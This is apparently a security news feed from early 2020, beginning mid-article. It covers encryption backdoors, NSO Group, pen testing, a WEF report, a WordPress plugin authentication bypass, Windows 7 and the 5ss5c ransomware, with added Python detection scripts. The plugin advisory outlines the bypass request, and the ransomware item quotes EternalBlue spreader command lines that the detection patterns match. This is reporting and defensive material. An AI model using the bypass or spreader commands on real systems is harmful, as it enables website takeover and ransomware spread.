However, that wasn’t good enough for attorney general William Barr, who has previously slammed tech companies for their stance on encryption, and Trump, who took to Twitter to share his ire with the world.

“We are helping Apple all of the time on TRADE and so many other issues, and yet they refuse to unlock phones used by killers, drug dealers and other violent criminal elements. They will have to step up to the plate and help our great Country, NOW!” he wrote.

The world’s leading encryption experts agree with Apple and other tech firms that creating backdoors for law enforcers would ultimately undermine security for hundreds of millions of legitimate business and personal users.

In 2018 they penned an open letter to FBI director, Christopher Wray, asking him to explain the technical basis for the Feds’ repeated claims that encryption backdoors can be engineered without impacting user security.

That request remains unanswered.

Israeli spyware firm fails to get hacking case dismissed

Judge orders NSO Group to fight case brought by Saudi activist and pay his legal costs

An Israeli judge has rejected an attempt by the spyware firm NSO Group to dismiss a case brought against it by a prominent Saudi activist who alleged that the company’s cyberweapons were used to hack his phone.

The decision could add pressure on the company, which faces multiple accusations that it sold surveillance technology, named Pegasus, to authoritarian regimes and other governments that have allegedly used it to target political activists and journalists.

Continue reading...

What is Network Penetration Testing?

Network Penetration Testing, also known as pen testing or ethical hacking, refers to the practice of identifying vulnerabilities in networks, systems, hosts or other related devices in a controlled environment. The objective of Network Penetration Testing is to identify and plug gaps in a network’s security apparatus before external actors like hackers find them.

Typically carried out by white hat hackers, network penetration tests are a type of external audit deployed by organizations from different sectors. Though similar to vulnerability assessments, there is a major difference: network penetration testing is not dependent on a signature-based approach, which could be outdated and unable to discover real-world vulnerabilities. Network penetration testing simulates how a real-world attack on the network may happen. In that sense, it gives an organization the perspective of the attacker and hence enables a better understanding of its own security posture.

To ensure a standardized approach, network penetration testing normally follows the globally-accepted Penetration Testing Execution Standard (PTES), which was developed in 2009. The methodology generally consists of the following steps:

Pre-engagement interactions

At this stage, the scope of the testing is outlined and finalized. Other pre-engagement interactions are also conducted to fully finalize on aspects of testing, analysis and results.

Intelligence Gathering

This stage is primarily involved in information gathering for the purpose of gaining knowledge about the network or system to be penetrated and its respective connections.

Threat Modeling

In this stage, vulnerabilities are identified within the network through automated scans or deep-dive manual techniques.

Vulnerability Analysis

This stage involves the documentation and analysis of vulnerabilities within the network to formulate an attack plan.

Exploitation

This is the stage where the actual exploitation attempt takes place, on the basis of the analysis of the vulnerabilities discovered.

Post Exploitation

In the Post Exploitation phase, further analysis is done of the exploited network to identify other means of access.

Reporting in Network Penetration Testing

This is a fact-finding stage where findings are analyzed and compiled into a report for action to be taken.

The cybersecurity industry is undergoing a paradigm shift where the focus for enterprises is rapidly shifting from threat detection to threat prevention. In such a scenario, it is imperative that enterprises have regular network penetration tests to gain a better understanding of their security posture. It is not enough anymore to depend on cybersecurity solutions alone; efforts must be taken to test and ensure cybersecurity stays up-to-date against ever-changing threats.

Red Team Assessments by Seqrite

In this regard, enterprises can consider Red Team Assessments which have been recommended by the Reserve Bank of India, India’s central bank, for banking institutions. In a red team exercise, highly trained security consultants attempt to breach the security of the organization to expose potential physical, hardware, software and human vulnerabilities.

A comprehensive Red Team exercise exposes vulnerabilities and risks regarding

  • Networks, applications, switches, mobile devices
  • Social engineering (onsite, telephone, email/text, chat)
  • Physical attacks (pen-drive bypass, camera evasion, alarm bypass, Wi-Fi attack etc.)

Red Team Audits are one among various services offered by Seqrite to enable organizations to proactively protect IT assets and respond to cybersecurity threats. Other services offered include Technical Audits, Compliance Audits, Security Management and Security Consulting.

The post What is Network Penetration Testing? appeared first on Seqrite Blog.

WEF Fears Cyber-Threats and Digital Fragmentation

Digital fragmentation and cyber-threats are among the top 10 biggest risks facing global businesses over the coming decade, according to the latest World Economic Forum (WEF) report.

The annual Global Risks Report is compiled from interviews with business leaders, academics and others from around the world.

This year there was a heavy focus on environmental concerns, but cyber-related risks also featured strongly, as they have done for years.

In total, 76% of respondents claimed that cyber-attacks disrupting operations and infrastructure would increase in 2020, while a similar number (75%) said the same about online data and financial theft.

Cyber-attacks were also placed in the top 10 risks table in terms of likelihood and impact over the coming decade, while data theft/fraud made it into just the former category.

Information infrastructure breakdown also made it into the top 10 most impactful risks for the coming decade, reflecting respondents’ concerns around the increasingly fragmented online world brought about by geopolitical rivalries and competing standards.

The WEF report pointed to fourth industrial revolution (4IR) technologies as bringing tremendous gains to society and the global economy, but also unintended cyber-risk, as the attack surface grows exponentially.

Quantum computing, 5G, cloud computing, AI and IoT were all highlighted as areas of concern, as was the lack of an effective and unified global cyber-governance framework.

Fragmentation of the digital world threatens to stifle the development of 4IR technologies and will add extra cost for businesses, it warned.

“Businesses are facing the challenge of implementing existing cybersecurity and 4IR standards (where they exist), while ensuring compliance with fragmented regulations on accountability, transparency, bias and privacy for developing — or simply applying — 4IR technologies,” the report continued.

“Because government and corporate leaders equally share the responsibility for promoting global cybersecurity and digital trust, cooperation between the public and private sectors is more vital than ever in areas such as information-sharing, collaboration with law enforcement agencies, and skill and capacity development.”

Renaud Deraison, CTO at Tenable, said the report’s findings made sense.

“As the world seeks continued growth and competitiveness in the global economy, we’re seeing many new projects take off, including building modern factories that are highly automated. This innovation can’t happen without a good grasp of the security and integrity of the digital components those factories rely on,” he argued.

“It’s not just about stopping bad actors from damaging these mission-critical services, as experienced in cities across the world, it's also about preventing them from getting a foothold in our environments to cause harm, be it physical, data theft or financial gain.”

Critical auth bypass issues affect InfiniteWP Client and WP Time Capsule WordPress plugins

WP Time Capsule and InfiniteWP WordPress plugins are affected by security flaws that could be exploited to take over websites running the popular CMS.

Experts at security firm WebArx have ethically disclosed vulnerabilities in WP Time Capsule and InfiniteWP plugins, both were patched earlier this month by the developer Revmakx.

The flaws in the WP Time Capsule and InfiniteWP WordPress plugins could be exploited to take over the more than 320,000 websites running them.

“We found that the InfiniteWP Client and WP Time Capsule plugins also contain logical issues in the code that allows you to login into an administrator account without a password.” reads the security advisory published by the experts.

The plugins are affected by logical issues that could allow attackers to log in as administrators without providing any password.

Security systems like firewalls might fail to detect the attempt of exploitation for these issues because authentication bypass vulnerabilities are often logical mistakes in the code and don’t actually involve a suspicious-looking payload.

InfiniteWP allows users to manage an unlimited number of WordPress sites from their own server; it has an estimated 300,000 installs.

The attacker could trigger the issue by sending a POST request with the payload written first in JSON and then encoded in Base64. The request will bypass the password requirement and log in with only the username of an existing account. All the attackers need to know is the username of an administrator on the WordPress site.

“The issue resides in the function iwp_mmb_set_request which is located in the init.php file. This function checks if the request_params variable of the class IWP_MMB_Core is not empty, which is only populated when the payload meets certain conditions.” continues the analysis.

“In this case, the condition is that the iwp_action parameter of the payload must equal readd_site or add_site as they are the only actions that do not have an authorization check in place. The missing authorization check is the reason why this issue exists.”

InfiniteWP Client versions before 1.9.4.5 are affected by the vulnerability.
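Because the bypass carries no suspicious-looking payload, the practical detection is to decode Base64 POST bodies and look for the two unauthenticated actions named in the advisory. The following is an added example, not code from WebARX, Revmakx or the plugins; it assumes each captured request is a dict with method, path, src_ip and body, that the JSON names the targeted account in a username key (the advisory says only the username is needed; the key name is my assumption), and it records rather than blocks, since a legitimate InfiniteWP admin panel uses the same add_site action when it first connects.

```python
"""Log-side detection for the InfiniteWP Client authentication bypass.

Added example; not code from WebARX, Revmakx or the plugins. The two actions
come from the advisory quoted above; request field names, the 'username'
key and the sample paths are assumptions.
"""
import base64
import binascii
import json

# Actions the advisory names as lacking an authorization check.
UNAUTHENTICATED_ACTIONS = {"add_site", "readd_site"}

# First fixed release named in the article.
FIXED_CLIENT_VERSION = (1, 9, 4, 5)


def is_vulnerable_client_version(version):
    """True if an InfiniteWP Client version string is older than 1.9.4.5."""
    parts = tuple(int(p) for p in version.strip().split("."))
    # Pad so that "1.9.4" compares like "1.9.4.0".
    parts = parts + (0,) * (len(FIXED_CLIENT_VERSION) - len(parts))
    return parts < FIXED_CLIENT_VERSION


def decode_iwp_payload(body):
    """Return the JSON object carried by a Base64-wrapped body, else None."""
    text = body.strip()
    if not text:
        return None
    try:
        raw = base64.b64decode(text, validate=True)
        obj = json.loads(raw.decode("utf-8"))
    except (binascii.Error, ValueError):  # UnicodeDecodeError is a ValueError
        return None
    return obj if isinstance(obj, dict) else None


def analyze_request(req, allowed_hosts=frozenset()):
    """Return a finding for a request matching the bypass shape, else None."""
    if req.get("method", "").upper() != "POST":
        return None
    payload = decode_iwp_payload(req.get("body", ""))
    if payload is None:
        return None
    action = payload.get("iwp_action")
    if action not in UNAUTHENTICATED_ACTIONS:
        return None
    src = req.get("src_ip")
    return {
        "src_ip": src,
        "path": req.get("path"),
        "iwp_action": action,
        "username": payload.get("username"),  # assumed key name
        "known_management_host": src in allowed_hosts,
    }


def scan_requests(requests, allowed_hosts=frozenset()):
    """Findings for matching requests that do not come from an allow-listed host."""
    findings = []
    for req in requests:
        finding = analyze_request(req, allowed_hosts)
        if finding is not None and not finding["known_management_host"]:
            findings.append(finding)
    return findings


def _constructed_body(obj):
    """Base64-wrapped JSON body for the constructed samples below."""
    return base64.b64encode(json.dumps(obj).encode("utf-8")).decode("ascii")


# Constructed sample traffic (not real captures); paths are placeholders.
SAMPLE_REQUESTS = [
    # Ordinary WordPress login form post: not Base64 JSON at all.
    {"method": "POST", "path": "/wp-login.php", "src_ip": "198.51.100.7",
     "body": "log=editor&pwd=secret"},
    # Expected traffic from the site's own InfiniteWP management panel.
    {"method": "POST", "path": "/", "src_ip": "192.0.2.10",
     "body": _constructed_body({"iwp_action": "add_site", "username": "admin"})},
    # Same shape from an unknown host: what the bypass looks like in logs.
    {"method": "POST", "path": "/", "src_ip": "203.0.113.42",
     "body": _constructed_body({"iwp_action": "readd_site", "username": "admin"})},
    # Base64 JSON with some other (hypothetical) action: not flagged.
    {"method": "POST", "path": "/", "src_ip": "203.0.113.42",
     "body": _constructed_body({"iwp_action": "some_other_action", "username": "admin"})},
]

KNOWN_MANAGEMENT_HOSTS = frozenset({"192.0.2.10"})

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS, KNOWN_MANAGEMENT_HOSTS):
        print(finding)
```

Run against real access logs, the allow-list should hold only the host that actually runs your InfiniteWP admin panel; any other source producing these findings deserves the same response as a successful administrator login.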

WP Time Capsule is a backup tool with around 20,000 installs. To bypass its authentication, the attackers need to send a POST request whose body contains a certain string.

Below is the timeline for both vulnerabilities:

  • 07-01-2020 – Reported the vulnerabilities to the developer of both plugins.
  • 07-01-2020 – Released protection module to all WebARX customers.
  • 08-01-2020 – Developer of the plugin released a new version for both plugins.
  • 14-01-2020 – Security advisory publicly released.

Don’t waste time, update your plugin installs as soon as possible!

Pierluigi Paganini

(SecurityAffairs – WordPress Plugin, hacking)

The post Critical auth bypass issues affect InfiniteWP Client and WP Time Capsule WordPress plugins appeared first on Security Affairs.

I’m still on Windows 7 – what should I do?

Support for Windows 7 has ended, leaving Marcy wondering how they can protect themselves

I do a lot of work on a Windows 7 desktop PC that is about five years old. I’m a widow and can’t afford to run out and get a new PC at this time, or pay for Windows 10. If I do stay with Windows 7, what should I worry about, and how can I protect myself? I have been running Kaspersky Total Security for several years, which has worked well so far. Marcy

Microsoft Windows 7 – launched in 2009 – came to the end of its supported life on Tuesday. Despite Microsoft’s repeated warnings to Windows 7 users, there may still be a couple of hundred million users, many of them in businesses. What should people do next?

Continue reading...

Elastic Cloud on Kubernetes 1.0 is now available

Elastic Cloud on Kubernetes (ECK) is moving out of beta and into general availability. As Elastic announced with the alpha release of ECK back in May 2019, the vision for ECK is to provide an official way to orchestrate Elasticsearch on Kubernetes and provide a SaaS-like experience for Elastic products on Kubernetes. Kubernetes has continued to grow in popularity and has become the standard for orchestrating container workloads, and Elastic has seen a growing number … More

The post Elastic Cloud on Kubernetes 1.0 is now available appeared first on Help Net Security.

5ss5c Ransomware emerges after Satan went down in the hell

The cybercrime group behind Satan ransomware and other malware seems to be involved in the development of a new threat named 5ss5c.

The threat actors behind the Satan, DBGer and Lucky ransomware, and likely Iron ransomware, are back with a new piece of malware named ‘5ss5c’.

Security researcher Bart Blaze believes that the threat actors have been working on the 5ss5c ransomware since at least November 2019, and that the malicious code is likely still under development. The expert, in fact, discovered a second spreader module within the code, packed with Enigma Virtual Box, that is named poc.exe.

“There’s quite some curiosities that indicate 5ss5c is still in active development and stems from Satan ransomware.” reads the analysis published by Blaze.

“This suggests they may be experimenting (poc often is an acronym for proof of concept).”

The expert discovered several artifacts that suggest 5ss5c stems from Satan ransomware; he also pointed out that updates for Satan stopped in August, while 5ss5c appeared in the threat landscape in November.

Like Satan, 5ss5c launches its processes via a downloader and leverages the EternalBlue exploit to spread. Blaze added that several Satan artifacts and tactics, techniques and procedures (TTPs) have similarities with both Satan and DBGer, and partially with Iron.

The file poc.exe is dropped to C:\ProgramData\poc.exe, and runs the command:

cd /D C:\ProgramData&star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload C:\ProgramData\down64.dll --TargetIp

that is similar to the command executed by the Satan ransomware:

cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp

Both Satan and 5ss5c have an exclusion list of files that the malicious code does not encrypt; the new ransomware’s list includes additional entries, such as the files associated with Qihoo 360 security solutions (i.e. 360download and 360safe files).

The 5ss5c ransomware drops a ransom note in Chinese that demands a ransom of 1 bitcoin for decryption.

The ransom demand doubles after 48 hours. The ransom note doesn’t include an attacker email address to contact for payment or a Bitcoin address; instead the ransomware prepends the email address (5ss5c(at)mail[.]ru) to the file name of each encrypted file. For example, test.txt becomes [5ss5c@mail.ru]test.txt.Y54GUHKIG1T2ZLN76II9F3BBQV7MK4UOGSQUND7U.5ss5c.
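The spreader command lines and the renamed-file convention quoted above are the parts of this report a SOC can turn directly into detections. The following is an added example, not code from Bart Blaze’s analysis or Security Affairs; it assumes process events are dicts with image and cmdline, that file listings are plain path strings, and, since the article shows only one token, that the token after the original name is any run of A-Z/0-9.

```python
"""Detection helpers for the 5ss5c indicators described in the article.

Added example; not code from Bart Blaze's analysis or Security Affairs.
Telemetry field names, the minimum-indicator threshold and the token
character set are assumptions.
"""
import re

# Fragments of the spreader command line quoted in the article (5ss5c and
# Satan share the star.exe / blue.exe EternalBlue-style invocation).
SPREADER_INDICATORS = {
    "lateral_tool": re.compile(r"\b(?:star|blue)\.exe\b", re.IGNORECASE),
    "smb_protocol": re.compile(r"--Protocol\s+SMB\b", re.IGNORECASE),
    "port_445": re.compile(r"--TargetPort\s+445\b", re.IGNORECASE),
    "rundll_payload": re.compile(r"--Function\s+RunDLL\b", re.IGNORECASE),
    "down64_dll": re.compile(r"--DllPayload\s+\S*down64\.dll\b", re.IGNORECASE),
}

# Dropped-file locations named in the article (compared case-insensitively).
DROPPED_FILES = {r"c:\programdata\poc.exe", r"c:\programdata\down64.dll"}

# [5ss5c@mail.ru]<original name>.<token>.5ss5c
ENCRYPTED_NAME_RE = re.compile(
    r"^\[5ss5c@mail\.ru\](?P<orig>.+)\.(?P<token>[A-Z0-9]+)\.5ss5c$"
)


def spreader_indicators(cmdline):
    """Names of the spreader indicators present in a command line."""
    return [name for name, rx in SPREADER_INDICATORS.items() if rx.search(cmdline)]


def is_spreader_command(cmdline, min_indicators=3):
    """A lone '--TargetPort 445' is not enough; require several fragments together."""
    return len(spreader_indicators(cmdline)) >= min_indicators


def is_dropped_file(path):
    """True if the image path is one of the dropped files named in the article."""
    return path.strip().lower() in DROPPED_FILES


def parse_encrypted_name(filename):
    """Return (original_name, token) if the name follows the 5ss5c rename pattern."""
    m = ENCRYPTED_NAME_RE.match(filename)
    return (m.group("orig"), m.group("token")) if m else None


def scan_process_events(events):
    """Flag events whose image is a dropped file or whose command line is the spreader."""
    hits = []
    for ev in events:
        reasons = []
        if is_dropped_file(ev.get("image", "")):
            reasons.append("dropped_file:" + ev["image"])
        found = spreader_indicators(ev.get("cmdline", ""))
        if len(found) >= 3:
            reasons.append("spreader:" + ",".join(found))
        if reasons:
            hits.append({"pid": ev.get("pid"), "reasons": reasons})
    return hits


def scan_file_names(paths):
    """Return [(path, original_name)] for files renamed by the ransomware."""
    found = []
    for p in paths:
        name = p.replace("\\", "/").rsplit("/", 1)[-1]
        parsed = parse_encrypted_name(name)
        if parsed:
            found.append((p, parsed[0]))
    return found


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {"pid": 100, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"pid": 200, "image": r"C:\ProgramData\poc.exe",
     "cmdline": r"C:\ProgramData\poc.exe"},
    {"pid": 201, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cd /D C:\ProgramData&star.exe --OutConfig a --TargetPort 445 "
                r"--Protocol SMB --Architecture x64 --Function RunDLL "
                r"--DllPayload C:\ProgramData\down64.dll --TargetIp 192.0.2.5"},
    # A benign tool that happens to mention port 445: below the threshold.
    {"pid": 300, "image": r"C:\Tools\scanner.exe",
     "cmdline": r"scanner.exe --TargetPort 445"},
]

SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\report.docx",
    r"C:\Users\alice\Documents\[5ss5c@mail.ru]test.txt.Y54GUHKIG1T2ZLN76II9F3BBQV7MK4UOGSQUND7U.5ss5c",
    r"C:\Users\alice\Documents\[5ss5c@mail.ru]budget.xlsx.AB12CD34EF56.5ss5c",
]

if __name__ == "__main__":
    print(scan_process_events(SAMPLE_EVENTS))
    print(scan_file_names(SAMPLE_PATHS))
```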

“Whoever’s behind the development of Satan, DBGer, Lucky and likely Iron ransomware, is back in business with the 5ss5c ransomware, and it appears to be in active development – and is trying to increase (or perhaps focus?) its targeting and spread of the ransomware.” concludes the expert.

The analysis published by Blaze includes the indicators of compromise (IOCs).

Pierluigi Paganini

(SecurityAffairs – cybercrime, ransomware)

The post 5ss5c Ransomware emerges after Satan went down in the hell appeared first on Security Affairs.